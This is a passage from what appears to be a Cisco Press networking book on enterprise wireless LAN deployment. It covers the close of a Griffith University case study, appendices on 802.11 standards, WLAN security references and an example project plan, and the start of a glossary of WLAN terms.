part of the global Electronic Warfare Associates corporation, based in Herndon, Virginia.
Understand Your Users

Renaud advises, "Ask your users what they want and where they want it." By surveying the university
faculty and student bodies, Scott's team was able to tailor, design, and implement a solution that was
much more likely to succeed, rather than simply deploying on a standard rolling basis.
Two surveys were undertaken: one for students and the other for academic staff. Satisfying explicit and
validated user requirements therefore formed a fundamental part of the design process. The web portal
also contains a "Have Your Say" feedback feature that allows users and staff to submit suggestions,
complaints, and requests. Scott's group makes it a priority to address these requests and reported
issues as they come up.
Furthermore, a Post Implementation Review survey was undertaken to quantify client satisfaction and
identify potential problem areas, including dead spots. The survey results will form part of the planned
fourth phase of deployment, with the university fine-tuning the solution.
Note
Griffith University's use of a Post Implementation Review is an excellent example of an
organization putting into action the optimize phase of the PPDIOO solutions lifecycle. By the
university ensuring that it is reactive to user requirements and the WLAN is fine-tuned, it
optimizes the solution and ensures continued success and client satisfaction.
Establish a Web Portal

The use of a comprehensive web portal has been critical to the success of Griffith University's WLAN.
Wireless@Griffith contains comprehensive solutions information, including interactive coverage maps,
training, trending reports, and more. Not only is a significant number of FAQs included, but the web
portal also includes up-to-date coverage maps at a campus level. Users can click on individual buildings
and drill down to floors and even rooms. Furthermore, coverage maps provide digital photographs of
every location and room where service is provided. Comprehensive links are provided not only to
external resources, including technical support pages for common WLAN vendors (Linksys, Apple, Dell,
and so on), but also to independent WLAN technical resources for those interested in the technology,
wireless industry, news, and market trends. Finally, user feedback is encouraged by the use of a "Have
Your Say" feature. University IT staff members carefully monitor user feedback and react to their
concerns and requests, again ensuring client satisfaction and the success of the solution.
Integrate the Solution into Existing Business Processes

The university already used a dedicated web-based reservation system for all bookable rooms in every
campus. This system was enhanced with specific details on what rooms and areas had wireless
connectivity. The WLAN was integrated into existing business processes, and at the same time, visibility
of the features was increased. By advertising wireless connectivity and therefore encouraging staff and
users to select wireless-enabled areas, and by providing a user-friendly web portal with
contemporaneous usage statistics, interactive coverage maps, and online feedback features, the wireless
network at Griffith University has become more than a simple 802.11g network. It has become a very
popular addition to the suite of services offered by the Information and Communication Technology Staff
group.
Furthermore, installation of dedicated wireless data outlets (above ceiling tiles in Griffith's case) was
added to the university's standard building design guidelines. At Griffith University, IT staff initiated this
decision early in the deployment process. They work closely with the university's office of facilities
management to ensure that all new buildings and refurbishments have wireless data outlets installed and
APs supplied, ready to be deployed as part of the standard building fit-out or refurbishment process.
Measuring the Benefits

The WLAN is the biggest PR win the IT organization has ever had.
David Renaud, wireless network support engineer
In a recent analysis of user trends at the university, Scott noted that the solution has recorded more
than 100,000 discrete logins in a six-month period. User adoption has been much greater than expected.
On a daily basis, the WLAN enjoys on average more than 200 concurrent sessions. At a minimum, the
connectivity this provides to the student body and faculty is equivalent to almost seven additional 30-PC
computer labs. Furthermore, adoption contiues to grow.
Because the service is spread over the five campus locations and provides connectivity on a demand
basis at locations convenient to students and staff, the benefits are dramatic. "Students love it," opines
Scott, the manager of the team responsible for the design and deployment of the solution. This view has
been borne out by the facts. During the first six months of 2005, there were more than 4,000 regular
users of the solution, and this number is expected to rise to even higher levels in the future. Even at the
current level, this number represents approximately 12 percent of the total student population and
nearly 25 percent of all laptop users (based on 2005 student numbers).

Scott's team plans on deploying a fourth phase of the WLAN. This phase will cover any dead spots
identified by the university's staff, but it will also react to user feedback and requests collected through
the solution's online user feedback feature. Phase Four will also cover nearly all PhD and research
spaces. Consultation with all faculty members and input from all IT support teams are being used to
determine which spaces will be covered.
Additionally, a pilot of 802.11-based wireless phones will be undertaken soon. Planned as a replacement
of existing pagers and two-way radios, the university's PABX is already capable of supporting VoIP, a
critical requirement for WiFi-based IP telephony.
Summary
Griffith University has succeeded in designing and deploying a very successful and popular wireless LAN
by focusing on business value and user requirements.
The university decided to deploy wireless LANs for both the student body and faculty in early 2004 on an
incremental, phased basis. Instead of introducing wireless LANs earlier, the university's Network and
Communications Services group waited for the technology to mature and for the group to better
understand their end-user requirements. Proactive engagement with the academic staff and student
body, including comprehensive user surveys, allowed the university to tailor the solution to exactly what
its users wanted.
The use of Smart Zones, targeted areas for wireless connectivity, allowed IT staff to carefully manage
the solution, providing a higher level of service and quality than typically experienced in institutions of
higher education.
A comprehensive web portal, Wireless@Griffith, has greatly assisted in the success of the solution.
Appendix A. Wireless LAN Standards

Reference
The standards for wireless LAN (WLAN) are part of the IEEE 802 family, which defines physical and data
link layer protocols in internetworking. The specific subset of standards that further define WLAN
protocols is covered within the 802.11 subset of working groups. This appendix describes the most
common 802.11 WLAN standards along with their proper nomenclature and a brief description. Figure A1 illustrates the relationship of the OSI internetworking model with the individual protocol.
Figure A-1. EEE 802.11 WLAN Standards
Standard
Specification
Description
802.11a
Wireless LAN Media Access Control

(MAC) and Physical Layer (PHY)
specifications: high-speed physical
layer in the 5-GHz band
Defines the link protocol for devices

in the 5-GHz spectrum. Uses
Orthogonal Frequency Division
Multiplexing (OFDM) for modulation.
802.11b
Higher Speed PHY extension in the

2.4-GHz band
Defines the link protocol for devices

in the 2.4-GHz spectrum. Uses Direct
Sequence Spread Spectrum (DSSS)
for modulation.
Standard
Specification
Description
802.11d
Wireless LAN MAC and PHY

Specifications: Specification for
operation in additional regulatory
domains
Identifies and selects operating radio

frequencies within geopolitical areas.
802.11e
Wireless MAC and PHY specifications:

MAC Quality of Service (QoS)
enhancements
In progress. Enhances 802.11 to

provide QoS. Is key to providing
voice and video in WLAN.
802.11f
Recommended practice for multivendor access point Interoperability

via an Inter-Access point protocol
across distribution systems
supporting IEEE 802.11
Provides IAPP for multi-vendor AP

interoperability across a distribution
system supporting 802.11 links.
802.11g
Further higher data rate extensions in Defines the extension for data rates
the 2.4-GHz band
in the 2.4-GHz spectrum. Uses OFDM
for modulation.
802.11h
Spectrum and Transmit Power

Specifies Dynamic Frequency
Management Extensions in the 5-GHz Selection (DFS) and Transmit Power
band in Europe
Control (TPC), allowing operation of
5-GHz bands in Europe. Potentially
will pave the way for additional
channels for 802.11 in North
America.
802.11i
Wireless LAN MAC security

enhancements
Enhances 802.11 to provide security

and authentication mechanisms.
802.11j
Wireless LAN MAC and PHY

specificationsAmendment 7: 4.9
GHz5 GHz Operation in Japan
Enhances 802.11a PHY and 802.11

MAC to allow operation of 4.9-GHz
and 5-GHz bands in Japan. Includes
World SKU radio, Outdoor OFDM, and
10-MHz channel spacing.
802.11k
Radio Resource Measurement (RRM)
In progress. Provides consistent

radio and network measurements to
higher layers.
Each standard addresses a specific layer in the OSI model.
Appendix B. Wireless LAN Security

References
Cisco has developed a number of resources that will help you to understand more about the safeguards,
best practices, and vulnerabilities that affect WLANs today. Additionally, many public resources that go
into further detail are available for review. This appendix lists many resources for WLAN security
information. This list is not exhaustive but will provide a strong starting point.
Cisco Resources
This section includes links to Cisco security topics and technologies.
Cisco SAFE
Cisco SAFE: Wireless LAN Security in Depth:
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_white_paper09186a008009c8b3.shtml
General Wireless Security Information

Cisco Wireless LAN Security Solution: http://www.cisco.com/go/aironet/security
Cisco Aironet Wireless LAN Security Overview:
http://www.cisco.com/en/US/products/hw/wireless/ps430/prod_brochure09186a00801f7d0b.html
Wireless LAN Security White Paper:
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_white_paper09186a00800b469f.shtml
Cisco-Specific EAP Protocols

Cisco EAP-FAST: Cisco EAP type developed to address "dictionary attacks." This protocol is used when
strong passwords cannot be enforced.
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_qanda_item09186a00802030dc.shtml
Cisco Wireless (LEAP): Initial WLAN protocol that allows for dynamic key generation and use of EAP to
ensure authentication.
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_qanda_item0900aecd801764f1.shtml
WEP
WEP is the initial encryption standard utilized by the 802.11 family of standards. The WEP specification is
defined in clause 8.2 of the 802.11 standard.
IEEE 802.11 Wireless Local Area Networks: http://grouper.ieee.org/groups/802/11/
WPA
WPA is a Wi-Fi Alliance standard developed to ensure interoperability between vendors to provide a
universal security solution.
Wi-Fi Protected Access Overview: http://www.wi-fi.org/OpenSection/pdf/WiFi_Protected_Access_Overview.pdf
WPA2
WPA2 is the successor to WPA and introduces even greater levels of security. WPA2 is based on the IEEE
802.11i standard.
WPA2 page on the Wi-Fi Alliance website: http://www.wi-fi.org/OpenSection/protected_access.asp"
802.1x
802.1x, or Port Access Security for LANs, is the first line of defense for LANs. It identifies a framework of
communication (both user and device) for authentication. 802.1x does not define the transport or
encryption method.
802.1X - Port Based Network Access Control: http://www.ieee802.org/1/pages/802.1x.html
EAP Types
As part of 802.1x, there are numerous EAP types that define the process for the secure transfer of data.
The 802.1x standard mandates only the use of EAP but does not specify how it is implemented. The
following RFC will provide you with some of the many versions of EAP types.
RFC 2284, PPP EAP TLS Authentication Protocol: http://www.ietf.org/rfc/rfc2716.txt
Note
Specific subfunctions of EAP help to ensure the identity of the end device. They are Identity,
Notification, NAK, and MD5-Challenge. You can learn about them in RFC 2284.
Secure Authentication, Access Control, and Data Privacy on Wireless LANs:

http://www.funk.com/radius/Solns/wlan_ody_wp.asp
EAP-SIM: http://www.ietf.org/internet-drafts/draft-haverinen-pppext-eap-sim-16.txt
Vulnerabilities
Vulnerabilities in WLAN have been and will continue to be exploited. The following is a listing of the wellknown attacks that exist today.
Paper from the University of California, Berkeley study (2001) that found that the IV (initialization
vector), sent in plaintext, will repeat itself over time.
Security of the WEP Algorithm: http://www.gta.ufrj.br/~eric/tese/artigos/wep-faq.html
FMS Attack (Fluhrer, Mantin, and Shamir) explored shortcomings with the RC4 algorithm. WEP does not
have a key rotation method, and after 100,000 to 1,000,000 packets, the IV can be broken and the WEP
key derived.
"Your 802.11 Wireless Network Has No Clothes": http://www.cs.umd.edu/~waa/wireless.pdf
Appendix C. Example Project Plan for an

Enterprise-Class WLAN Deployment
The project plan explained in this appendix is an example of how a team can plan, manage, and track an
enterprise-class WLAN deployment. For illustrative purposes, the project plan makes certain
assumptions and is limited to a relatively small business. The concepts and approach are the same,
however, for larger deployments. For this example, the project commences on the first Monday of 2005
(January 3, 2006).
The project plan is not intended as a comprehensive tool or reference, but rather as an example of how
a hypothetical corporation should manage a deployment. Because most organizations have their own
approach to project management including using one of the many public domain methodologies. It is
important to develop a customized project plan in line with whatever methodology you adopt and use
the example in this chapter only as a reference and inspiration for initial planning and discussion.
You can find copies of the project plan Gantt chart at the Cisco Press website dedicated to this book.
Please go to www.ciscopress.com/title/1587201259 to find a PDF of the project plan for your review,
which you can use in conjunction with this chapter.
Company Background
Example Ltd is a medium-sized enterprise with seven offices spread across California. Their corporate
headquarter (HQ) campus consists of three buildings, including one light manufacturing plant, and
houses 200 staff. Their six satellite offices are detached buildings and house between 5 to 90 employees
each. Their two smallest sales offices are excluded from the deployment, so five sites are identified for
coverage. Example Ltd has a centralized IT department based in the HQ and a varying number of local
IT support staff at its five largest sites.
The Project Plan

The project plan is organized into 11 separate sections. These are not necessarily in temporal order
because several tracks are contemporaneous with each other. You may wish to organize your own
project plan along different lines, or in line with your adopted project management methodology. The
sections of the example project plan are as follows. Each section is discussed in this appendix:
Business Issues
Discovery
Architecture
Design
Testing
Logistics
Pilot
Communications
Support
Deployment
Post Project Activities
Business Issues
The Business Issues section deals with the initial business-related issues and is primarily, but not
exclusively, concentrated at the beginning phases of the project.
A project kickoff meeting is planned, and the business goals are reviewed with a "go/no go" milestone
following. No other effort can proceed before this decision.
A project steering committee is created and regular monthly meetings scheduled. For this small project,
the project steering committee includes not only the executive sponsor and IT manager but also the
project manager and his senior network architect.
Note
In larger deployments, the project steering committee is usually an executive body that meets
on a regular basis and is updated by the project manager on project variances. The project
steering committee usually includes the executive sponsor of the initiative and senior
representatives from IT, HR, finance, facilities management, and so on.
The steering committee defines the scope of the project, including identifying which sites will be
covered. In our example, the committee decides to exclude the two small sales offices. A list of site
owners (local business and IT contacts) creates a request for comment (RFC) for both the wireless
equipment and the cabling.
Discovery
The Discovery phase is concentrated at the beginning of the project lifecycle. In this section of the
project, the steering committee sets aside four weeks to evaluate the equipment from various
manufacturers or solutions providers. This is sometimes known as a "manufacturer bake-off" and is a
detailed testing, evaluation, and selection process where the enterprise tests the shortlist of products,
usually in a lab environment, and selects the one most appropriate to the enterprise's need.
The equipment is finally selected, and pricing and contractual negotiations follow. For the purposes of
our sample project, it is assumed that a WLAN controller-based solution is selected. Once selected, the
enterprise purchasing department signs a contract for the supply of the equipment.
The selection of a cabling contractor occurs simultaneously because this choice is independent of the
final equipment used in the deployment. The RFC is sent to various vendors, and their responses are
evaluated. By the time the steering committee selects the equipment or solutions provider, the cabling
vendor should also have been identified.
Architecture
The Architecture section deals with the development of the high-level solutions architecture. An
architectural team is defined and regular monthly architecture meetings planned. The architecture team
will probably be limited to senior technical staff consisting of network, operations, and security
architects. The architecture team will report to the project manager and ultimately the project steering
committee.
Note
This architecture team can be considered the main drivers, reviewers, and approvers of the
solution but will probably not be involved in the detailed and specific design and configurations.
In some organizations, the architecture team and the detailed design team are the same.
The architecture team defines the high-level architecture for the solution, ensuring it is in line with
business drivers and requirements of the steering committee. At this stage, the team also defines the
security architecture. Finally a week is set aside for business review, and an architecture document is
created. The business review is where the steering committee and the CEO (in our example) review the
architecture and validate that it satisfies the business goals. This is a major milestone.
Design
After the WLAN architecture has been defined and approved, a detailed technical design can commence.
A technical design team is created and weekly meetings scheduled.
Note
While the architecture team tracks technical progress against the high-level solution
architecture, the design team is responsible for the detailed design, settings, and configuration
of the equipment. In some deployments, the architecture and design team would be combined
into one team; that is, both functions would be carried out by the same individuals.
Six weeks are set aside for drawing up a detailed technical design. This is subsequently updated with
changes that arise as a result of the test plan (see the following section, "Testing").
After a period, the detailed design document is once more revisited and updated. These updates occur
after the pilot and reflect responses to gaps, customizations, or tweaks that come to light during the
pilot.
A final detailed design guide is eventually completed. This is a major milestone.
Testing
The design team creates a lab that reflects the initial technical design, and it is integrated with Example
Ltd's existing authentication and entitlement infrastructure. Three weeks of testing follow, and the
results are documented. The findings affect (positively or negatively) the technical design, as mentioned
in the previous section.
Logistics
The Logistics section deals with the logistics of equipment ordering and delivery. Equipment is ordered
and delivered to Example Ltd's HQ; 30 days of lead time are included by way of example.
Staging follows, where the equipment is unpacked and tested, and deployment packs are created for
each site. These include the equipment required for each site, installation instructions, schematics, and
so on.
Two weeks are set aside for delivery to the four satellite offices.
Pilot
After the project "go/no go" milestone is achieved, a pilot site is identified. A pilot site kickoff meeting is
held and a pilot design guide is created, based upon the initial technical design created (as detailed in
the Design section earlier). Pilot site documentation and user communication collateral is created.
The pilot installation follows, with floor plans imported into the management and planning tool, the
location of APs defined, the WLAN controllers and access points installed, and the pilot site finalized for
use. Users are notified, and the pilot commences. For the purposes of this plan, it is assumed that the
pilot lasts approximately 10 weeks.
User feedback is collected, documented, and analyzed, and the technical design is updated to reflect the
pilot findings.
Communications
The Communications track does not lie on the critical path and as such can commence early on in the
project lifecycle. A communications team is defined and an internal solutions program website is created.
Project and site communication packs are created. User guides, FAQs (Frequently Asked Questions), and
helpdesk scripts are also developed by the design team, in partnership with any dedicated HR
communications staff available.
Note
Some large-scale deployments utilize external vendors to help manage client communication
and training. This is more common in very large or multinational deployments.
Support
The Support section deals with the activities relating to solutions, technical support, and maintenance. A
week is set aside to define the Service Level Agreement (SLA), and the support plan is documented.
Training material for the technical support helpdesk team is produced in conjunction with the design
team, along with more detailed second and third line troubleshooting and training collateral.
Deployment
The Deployment section details the tasks associated with the installation of the solutions infrastructure.
It is assumed that each of the five sites will be deployed consecutively, with Example Ltd using many of
the same centralized IT staff for each deployment.
The deployment only commences once the final technical design guide is complete, including updates
from the test plan and pilot.

The deployment itself follows closely that which was undertaken for the pilot. Floor plans are imported
into the management and planning tool, AP locations are defined, WLAN controllers and the access
points are installed, and three weeks are spent on client communication and training. WLAN client
adaptors are distributed to end users who are not provisioned with wireless-ready laptopsthat is, laptops
that already have wireless cards embedded.
The site is then launched into production. By staggering the launch of each site, high support overhead
is avoided, and the IT support staff are free to deal with end users on a site-by-site basis.
Post Project Activities

After the last site is complete, the post project activities are undertaken. A week is spent analyzing enduser satisfaction and feedback. A Post Project Review document is created that incorporates an initial
return on investment (ROI) and "lessons learned" section. Finally, this document is presented to the
project steering committee, and the project is formally completed.
Summary
This basic project plan gives you an overview of the planning and progress of a relatively small project.
You can see the impact of lab testing and pilots on the final design and deployment. It is also clear how
several activities, such as client communication and support planning, are not on the critical path and
can be undertaken contemporaneously with other activities.
Glossary
This glossary will help you to understand some of the more common WLAN-related marketing, technical,
security, and industry terms used throughout this book and in related publications and discussions.
These definitions should not be considered canonical and are provided as a quick reference only. Finally,
this list should not be considered comprehensive because many obscure terms have been omitted, and
new words and phrases are often introduced as the industry grows.
Numbers
3DES
A variant of the Data Encryption Standard (DES), used for encrypting data. The encryption key for
3DES is three times the size of that used for DES. (The same key is used three times.) Also known
as "Triple DES."
802.1x
An IEEE standard for port-based network access control. Limits access to the medium (wired or
wireless) until the client has been authenticated. Several authentication methods are supported via
the Extensible Authentication Protocol (EAP). There are three constructs within an 802.1x system:
the supplicant (or client device), the authenticator (the access point or switch), and the
authentication server (the server that authenticates the session).
802.11a
An IEEE WLAN standard that defines transmission in the 5-GHz range and provides up to 54-Mbps
bandwidth, although actual throughput will always be lower than this. 802.11a uses Orthogonal
Frequency Division Multiplexing (OFDM), which helps provide greater bandwidth. 802.11a is not
approved for use in many European countries without additional frequency and power restrictions
(as defined by the supplementary 802.11h standard).
802.11b
An IEEE standard that defines transmission in the 2.4-GHz range and provides up to 11-Mbps
bandwidth; actual throughput will always be lower than this. 802.11b is the most widely deployed
WLAN standard today. It is being replaced by 802.11g, which is backward compatible with
802.11b equipment but can provide greater bandwidth.
802.11c
An IEEE standard, focusing on the MAC layer, that deals with wireless bridging.
802.11d
An IEEE standard that supplements the physical layer requirements (defined in other 802.11
standards), extending the operation of 802.11 WLANs to new regulatory domains (countries). Also
known as "worldmode" because it ensures that compliant equipment can work in different
countries, not just the United States.
802.11e
An IEEE standard that defines enhancements to the Media Access Control layer to provide quality
of service (QoS). QoS is very important for wireless voice and video, but it can also be used to
prioritize sensitive traffic.
802.11f
An IEEE standard for Inter Access Point Protocol (IAPP), a specification to promote multivendor
access point interoperability. 802.11f is used to support fast client roaming.
802.11g
An IEEE standard that defines transmission in the 2.4-GHz range and provides up to 54-Mbps
bandwidth; actual throughput will always be lower than this. The increase in bandwidth over
802.11b (which uses the same frequency range) is achieved by using OFDM (Orthogonal
Frequency Division Multiplexing). OFDM allows for more efficient data encoding, which therefore
increases available bandwidth. 802.11g is a relatively new standard that is also backward
compatible with 802.11b; this feature has dramatically increased its adoption rate within the
industry.
802.11h
An IEEE standard that defines two additions to the MAC and PHY layers of 802.11a, allowing the 5GHz standard to be used in Europe. The enhancements are Dynamic Frequency Selection (DFS)
and Transmission Power Control. Both provide more control over the 5-GHz signal, as required by
European regulations (CEPT Recommendation ERC 99/23).
802.11i
An IEEE standard that provides for greatly enhanced security. 802.11i provides for dramatically
improved data encryption through the use of Advanced Encryption Standard (AES) instead of the
older Wired Equivalent Privacy (WEP). It also specifies Temporal Key Integrity Protocol (TKIP), an
additional method of increasing data integrity. The additional protocols required by 802.11i (AES
and TKIP) provide enhanced protection against replay attacks, greatly increased encryption, data
integrity checks, and so on.
802.11j
An IEEE standard that specifies extensions for the Japanese market and regulatory requirements.
802.11k
A proposed IEEE standard for radio resource management. 802.11k will improve roaming
decisions by sharing information between the access point and the client.
802.11l
There is no 802.11l standard. It was deliberately skipped because the letter L was deemed
typographically unsound; it could easily be misread.
802.11m
An IEEE specification that deals with maintenance and administrative issues concerning the other
802.11 standards. It is often referred to as "802.11 housekeeping."
802.11n
A proposed IEEE standard for high-throughput WLANs (with theoretical speeds of over 500 Mbps,
although speeds in the range of 100 to 200 Mbps are more likely). 802.11n will provide these
much greater speeds through a combination of MIMO (multiple-input multiple-output) and OFDM.
MIMO uses multiple transmitter and receiver antennas to provide increased data throughput.
802.11o
A proposed IEEE standard for fast re-authentication. This feature will assist wireless voice services
especially, because fast re-authentication improves voice quality when moving from access point
to access point while using a WiFi phone.
802.11p
A proposed IEEE standard for using wireless in moving vehicles. 802.11p is also known as WAVE
(Wireless Access for the Vehicular Environment) and is planned to interoperate with the DSRC
(Dedicated Short Range Communications) industry forum.
802.11q
A proposed IEEE standard for wireless VLAN management. This proposal would allow for
standards-based support for multiple VLANs per access point.
802.11r
A proposed IEEE standard for fast roaming. Like fast re-authentication (addressed in the 802.11o
proposal), fast roaming is especially important for wireless voice applications and services.
802.11s
A proposed IEEE standard for mesh wireless networks. Mesh wireless networks are made up of
many access points that communicate with each other via "wireless self-configuring multi-hop
topologies." Put simply, this means that the access points not only provide wireless connectivity to
client devices, but also communicate with each other via RF, thereby avoiding the need to cable
every access point. Mesh wireless networks are typically deployed in outdoor environments, where
coverage is required in large areas and it may be difficult or costly to cable every device.
802.11t
A proposed IEEE standard for producing wireless performance metrics. This will be useful in
promoting standardized reporting, trending analysis and statistics, and so on. This effort is also
known as WPP (Wireless Performance Prediction).
802.11u
A proposed IEEE standard for interoperability between WLANs and other non-WiFi networks, such
as cellular networks. This is also known as WIEN (Wireless Internetworking with External
Networks).
802.11v
A proposed IEEE standard for wireless network management, including client device management.
This would allow, for example, the access points to configure and manage certain aspects of client
behavior.
802.11w
A proposed IEEE standard for introducing "management frame protection." Management frames
are transmissions that include important management information and are currently vulnerable to
malicious interference. This standard would protect these frames, avoiding interference or attacks
that could potentially cause network disruption.
802.11x
There is no 802.11x standard directly, as the letter X is sometimes used to denote a generic value.
As such, 802.11x is sometimes used to refer to the entire range of 802.11 standards. Do not
confuse this with 802.1X, a separate IEEE standard for port-based network access control. 802.1X
is the basis for most enterprise class wireless network security.
802.11y
A proposed IEEE standard to introduce a predictable and "fair" method to share frequency bands
or channels in WLANs. This effort is also known as CBP (Contention Based Protocol).
802.11z
There is currently no 802.11z standard.
802.15
The IEEE standard for 2.4-GHz personal-area networks (PAN). 802.15 is better known as
Bluetooth. See also Bluetooth.
802.16
The IEEE standard on broadband wireless wide-area networks (WANs). 802.16 works in the 10-to
66-GHz frequency ranges.
A
AAA
Authentication, authorization, accounting. This term is used to describe a generic system or
solution that ensures that only authenticated users or devices gain access to the network in a
recorded and auditable manner. This framework is usually provided by a AAA server. Examples
include Microsoft Active Directory servers, RADIUS servers, and Cisco Access Control Servers. The
user or device must supply a set of credentials to the AAA server, which, upon validation,
approves access to the network and records the transaction. Some AAA services also monitor and
record user activity and what services are accessed.
access layer switch

Access layer switches are the wired devices that provide connectivity to your wired network.
Access points are usually connected to access layer switches. Also known as network edge
switches.
access point
See AP.
ACL
Access control list. A managed list that defines network traffic controls by protocol, port, address,
or time. The ACL defines the traffic that is permitted and the traffic that is denied.
ad-hoc network
In WLAN terms, an ad-hoc network is one in which two or more WLAN clients communicate with
each other directly, without the use of an access point (AP). Ad-hoc networks are usually used by
small, home, or SOHO networks on a peer-to-peer basis without a central communication hub.
AES
Advanced Encryption Standard, based upon a symmetric encryption algorithm. AES provides
significantly more security than WEP and forms part of the 802.11i standard. It is also a Federal
Information Processing Standards (FIPS)-approved algorithm. The AES, documented in FIPS
Publication 197, specifies a symmetric encryption algorithm for use by organizations to protect
sensitive information. See also 802.11i; CCMP.
amplitude
The strength of a radio signal.
AP
Usually a hardware device that acts as a communication hub for wireless clients, linking 802.11
stations to a wired backbone network. Each access point effectively creates a radio cell through
which all traffic must pass. Access points are often abbreviated to AP in industry literature.
association
The relationship established between wireless clients and access points. Association denotes a MAC
layer connection between the client and the AP.
attenuation
The loss of signal strength when radiated due to environmental factors, such as walls, furniture,
building material, and so on. Attenuation is also caused by long lengths of transmission cable.
authentication server
Another term for a AAA server. See also AAA.
authenticator
A device that authenticates a client. In EAP-based wireless networks, the access point usually acts
as an authenticator by passing the request upstream to a AAA server for validation. Upon
successful validation of the user's or device's credentials, the authenticator permits it access to the
network.
B
band
A set of adjacent frequencies lying within a definite range.
Bluetooth
A short-range wireless cable replacement technology. Bluetooth is the brandname for the IEEE
802.15 personal-area network standard. Bluetooth also uses the 2.4-GHz frequency range.
BSS
Basic Service Set. A MAC layer grouping of wireless devices that communicate with each other. A
BSS is a single radio cell formed by a single base station or access point.
C
CA
Certificate authority. Network software that issues and manages security credentials and public
keys for authentication and message encryption. As part of a public key infrastructure (PKI), which
enables secure exchanges of information over a network, a certificate authority checks with a
registration authority (RA) to verify information provided by the requestor of a digital certificate. If
the registration authority verifies the requestor's information, the certificate authority can issue a
certificate. Based on the PKI implementation, the certificate content can include the certificate's
expiration date, the owner's public key, the owner's name, and other information about the public
key owner. See also RA.
CCMP
Counter-Mode Cipher Block Chaining Message Authentication Code Protocol. CCMP is the AESbased encryption protocol defined in 802.11i. CCMP is a symmetric key block cipher mode
encryption protocol.
certificate
A generic term used to describe a digital signature of a device. Certificates are used to generate
keys used in a PKI (public key infrastructure) environment.
certificate authority
See CA.
channel
A frequency band in which a specific broadcast signal is transmitted.
CHAP
Challenge Handshake Authentication Protocol. An authentication scheme that uses a three-way
handshake (challenge, response, verify) to authenticate the identity of the peer. CHAP is defined in
RFC 1334. The client responds to the server's challenge message, which in turn verifies the
response by comparing it to the expected value. If it is successfully verified, the client is
authenticated.
CLI
Command-line interface. The command-line interface is a nongraphical method of managing a
network device, such as an access point. IOS is an example of a CLI-based solution. Note that
many CLI interfaces also provide more user-friendly graphical user interfaces (GUI). Also known as
"command line" and "command prompt."
client
In a WLAN, a client is any device with a radio interface that does not act as a pass-through or
relay.
collision
The result of two or more stations attempting to transmit a packet across the network at the same
time, when the network uses a shared medium. Because wireless networks use a shared medium
or single segment per access point, collisions can occur quite regularly. WLANs use a technique
called CSMA/ CA to reduce such collisions because they can result in packet loss and can
negatively impact the performance of the network.
command-line interface
See CLI.
CRC
Cyclic redundancy check. A simple method of checking message integrity.
CRL
Certificate Revocation List. A list of certificates that have been revoked by the certificate authority
(CA). A CRL is analogous to a "blacklist" of certificates that are no longer permitted or accepted.
cryptography
The ISO defines cryptography as "[the] discipline which embodies principles, means, and methods
for the transformation of data in order to hide its information content, prevent its undetected
modification, and/or prevent its unauthorized use." [ISO 7498-2: 1989]
CSMA/CA
Carrier sense multiple access with collision avoidance. The mechanism used by WLANs to reduce
and detect packet collisions within cells. If a collision is detected, the station retransmits later
based upon an exponential random back-off algorithm.
D
dBi
Decibels isotropic. A relative gain measurement with respect to an isotropic radiator in free space
(uniform emitter in free space, a theoretical situation). It usually describes gain for antennas
operating at 1 GHz or above.
dBm
Decibels milliwatt. Decibels referred to a reference level of 1 milliwatt (mW). dBM is a measure of
power in communications: the decibel in reference to one milliwatt.
decibels
A measurement method used to simplify the expression and calculation of wireless power levels. It
is also the unit used for measuring antenna gain. Decibels are abbreviated as dB, and you may
also see dBm and dBi.
demilitarized zone
See DMZ.
DES
Data Encryption Standard. DES is a well-established symmetric key encryption algorithm
standardized by ANSI in 1981 as ANSI X.3.92. It was originally defined by the National Institute of
Standards and Technology.
DHCP
Dynamic Host Configuration Protocol. A standard network protocol that dynamically assigns IP
addresses, and other settings, to clients, usually from a centralized DHCP server.
Direct-Sequence Spread-Spectrum
See DSSS.
DMZ
Demilitarized zone. Takes its name from the neutral ground between two opposing parties. A DMZ
separates trusted and untrusted networks.
DNS
Domain Name System. The method by which Internet domain names are validated and translated
into IP addresses. The scheme uses a distributed set of DNS servers. Enterprises can also create
and operate their own DNS servers within their own networks.
DSSS
Direct-Sequence Spread-Spectrum. DSSS generates spread-spectrum transmissions, which are
transmitted concurrentlythat is, over two or more frequencies. This technique increases the
signal's resistance to interference. DSSS is one of two types of spread-spectrum radio technology
used in WLAN transmissions, the other being FHSS.
Dynamic Host Configuration Protocol

See DHCP.
E
EAP
Extensible Authentication Protocol. EAP is a general protocol for authentication that also supports
multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates,
public key authentication, and smart cards.
EAPoL
EAP over LAN. A message structure for sending EAP packets in an 802.1x framework.
EAP-FAST
Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling. An EAP
mechanism proposed by Cisco Systems that provides robust and secure authentication through
the use of encrypted tunnels. Unlike PEAP or EAP-TLS, EAP-FAST does not require certificates on
clients or servers.
EAP-TLS
Extensible Authentication Protocol with Transport Layer Security. EAP-TLS is one of the many EAP
mechanisms for 802.1x-based authentication. It uses certificates to ensure mutual authentication
between the client device and the authenticator and AAA servers.
EAP-TTLS
Extensible Authentication Protocol with Tunneled Transport Layer Security. EAP-TTLS is a
proprietary EAP mechanism developed by Funk Software, Inc., (prior to their acquisition by
Juniper Networks) and Certicom for 802.1x authentication. TTLS uses a combination of certificates
and password challenge and response for authentication and encrypts the entire EAP session in a
TLS tunnel.
encryption
Encryption is the process of changing data into a form that can be read, or decrypted, only by the
intended receiver. Encryption uses a "key" to scramble the data. This can be shared via a public
key infrastructure (PKI) system, or both ends of the transmission can use pre-shared keys.
ESS
Extended Service Set. Multiple basic service sets (BSS) linked by a backbone network to form a
single subnetwork.
ETSI
European Telecommunications Standards Institute. The primary telecommunication standards
organization in Europe.
EWC
Enhanced Wireless Consortium. An industry consortium of leading wireless industry members
formed to accelerate the ratification and adoption of the upcoming 802.11n standard and to
ensure interoperability between member-developed products.
F
Faraday Cage
An electrical apparatus designed to prevent the passage of electromagnetic waves, either
containing them in or excluding them from its interior space. It is named for physicist Michael
Faraday, who built the first one in 1836. Also known as a "screen room" or "FCC cage."
fast handoff
See fast roaming.
fast roaming
A generic term used in the WLAN industry to denote various proprietary mechanisms to decrease
the amount of time taken for clients to roam from wireless cell to cell. Fast roaming is especially
important for wireless voice services because even very minor delays or service interruptions,
often overlooked in data applications, can have an adverse affect on voice traffic.
FCC
Federal Communications Commission. The U.S. regulatory body for telecommunications, including
